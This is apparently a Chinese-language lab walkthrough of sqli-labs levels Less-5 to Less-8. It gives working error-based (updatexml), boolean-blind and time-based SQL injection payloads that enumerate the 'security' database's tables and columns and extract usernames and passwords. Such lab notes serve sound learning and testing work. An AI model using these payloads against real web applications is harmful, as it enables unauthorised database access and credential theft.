五.less-5
1.判断闭合
发现是'闭合
访问报错了,但是查看报错的原因,明显跟单引号的闭合问题有关
且正确的回显只有这么一种回显,所以我们可以从利用报错的信息进行注入
2.查询字段数
4时报错所以是3
3.判断回显点
根据第二步可以判断回显位是报错信息
4.爆数据库用户
5.爆数据库名
6.爆数据库表名
7.爆字段名
二.less-6
1.查询数据库名
?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1) --+
2.查询表
?id=1 "and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+
3.查询列
?id=1 "and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),0x7e),1) --+
三.less-7
1.判断闭合
布尔盲注
?id=1'))--+
2.判断字段数
?id=1')) order by 4 --+
3.判断数据库名
这是第一位字符
?id=1')) and ascii(substr(database(),1,1))>114--+
最后得出数据库名位security
4.数据库表
这是第一个表的第一个字符
id=1'))and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+
最后得出四张表:emails、referers、users、uagents
5.表中内容
判断出users表的第一个字段的第一位字符:
?id=1')) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1.1))>104--+
最后得出所有字段为:id,username,password
6.判断username字段的第一个值
id=1'))and ascii(substr((select username from users limit 0,1),1,1))>1--+
最后得出username和password的全部值
四.less-8
1.判断页面是否跟随我们的sleep语句延时
?id=1'and sleep(3)--+
发现存在所以是时间盲注
之后使用if((布尔盲注语句),sleep(1),1)--+
和上面哪个布尔盲注一样得到内容